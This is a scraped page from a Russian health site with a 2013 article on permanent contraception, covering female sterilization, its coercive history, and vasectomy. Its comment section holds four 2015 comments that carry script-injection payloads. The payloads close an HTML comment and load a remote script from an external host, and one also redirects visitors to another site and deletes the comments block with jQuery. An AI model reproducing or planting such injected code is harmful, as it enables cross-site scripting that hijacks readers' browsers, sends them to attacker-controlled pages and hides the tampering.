Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как не забеременеть никог...  >>  Как не забеременеть никогда
 
Обратная связь
 

Как не забеременеть никогда

Размер шрифта
05 июня 2013 14:37
  • google_analytics: false
  • Нравится

Рождение ребенка – это, безусловно, большое счастье. Однако согласитесь, что далеко не всегда беременность желанна.

На этот случай существует огромное количество средств контрацепции – от презервативов и внутриматочных спиралей до гормональных препаратов. Сегодня мы расскажем вам о радикальных методах контрацепции, которые помогают раз и навсегда.

Что такое оплодотворение

Оплодотворение (или, что тоже самое, зачатие) – процесс слияния мужской половой клетки (сперматозоида) и женской (яйцеклетки). В результате образуется одноклеточный эмбрион, который называется зиготой. Зигота несет генетический материал как матери, так и отца.

Хотя только одному сперматозоиду суждено слиться с яйцеклеткой, для успешного зачатия необходимо участие огромного количества мужских половых клеток. Они выделяют ферменты, «растворяющие» оболочки яйцеклетки. Чем больше сперматозоидов – тем больше ферментов – тем больше вероятность удачного оплодотворения.

Безвозвратная контрацепция. Женская стерилизация

Женская стерилизация – это радикальный метод контрацепции, в ходе которого хирургическим путем нарушается проходимость маточных труб, через которые должны были пройти яйцеклетки. Таким образом, оплодотворение становится невозможным. Менструации, половое влечение, способность к половому акту и оргазму при этом сохраняются.

Первые опыты по принудительной стерилизации женщин проводились в начале ХХ века, США, Канаде, Швеции, Дании. В этих странах были приняты законодательные акты, согласно которым стерилизации подвергали лиц с асоциальным поведением и психическими расстройствами. В нацистской Германии с 1933 по 1945 год было стерилизовано 400 000 женщин, среди которых «расовонеполноценные»: евреи, чернокожие, славяне.

Сегодня, конечно, эта процедура выполняется исключительно по желанию женщины. Более того, гражданам России стерилизация разрешается только при возрасте выше 35 лет или наличии 2 детей, или при наличии медицинских показаний.

Безусловно, эффективность этого метода высока. Но нужно понимать, что не все так просто. Во-первых, в некоторых случаях возможно развитие нежелательной беременности (что хуже всего – чаще внематочной) вследствие спонтанного восстановления проходимости труб. Во-вторых, если вы вдруг захотите завести еще одного ребенка, вам, скорее всего, придется прибегнуть к ЭКО. В-третьих, возможно развитие ряда послеоперационных осложнений (например, болевого синдрома).

Таким образом, хорошенько подумайте перед тем, как решиться на стерилизацию. Этот метод может быть рекомендован многодетным матерям.

Вазэктомия

Вазэктомия – это хирургическая операция, при которой производится перевязка или удаление фрагмента семявыносящих протоков у мужчин, по которым должны были пройти сперматозоиды. В результате возникает азооспермия (отсутствие сперматозоидов в эякуляте), и оплодотворение становится невозможным.

Если у вас возникли ассоциации с кастрацией, отбросьте их в сторону: вазэктомия не приводит к эстетическим дефектам, не нарушает продукцию половых гормонов и не является причиной проблем в сексуальной сфере.

После вазэктомии также возможно развитие хронического болевого синдрома, но в целом этот метод можно охарактеризовать как более положительный в сравнении с женской стерилизацией. Потому как, в отличие от последней, последствия вазэктомии намного легче устранить хирургически (если вдруг мужчина решил завести еще одного ребенка). Для это существует особая методика – вазовазостомия, по сути – анастомозирование концов семявыносящих протоков.

Таким образом, метод может быть рекомендован мужчинам, у которых много детей и которые не хотят заводить новых.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:16

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 19:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 23:15

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как сохранить красоту и здоровье после 30?   Подготовка к беременности   Стерилизация   Как пережить расставание по науке  
10 июля 2012Гормон, отвечающий за материнские чувства, способен бороться с лишним весом 09 июля 2012Ученые выяснили, какой вид контрацепции надежнее!
 
30 января 2012УЗИ – новый метод контрацепции? 26 сентября 2011Подростки не знают о безопасном сексе
 

Слайдшоу

1
Как не забеременеть
Методы контрацепции
Семнадцать способов не стать мамой

Тесты

Как подобрать контрацептивы?
Насколько у вас велик риск заболеть ВИЧ?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.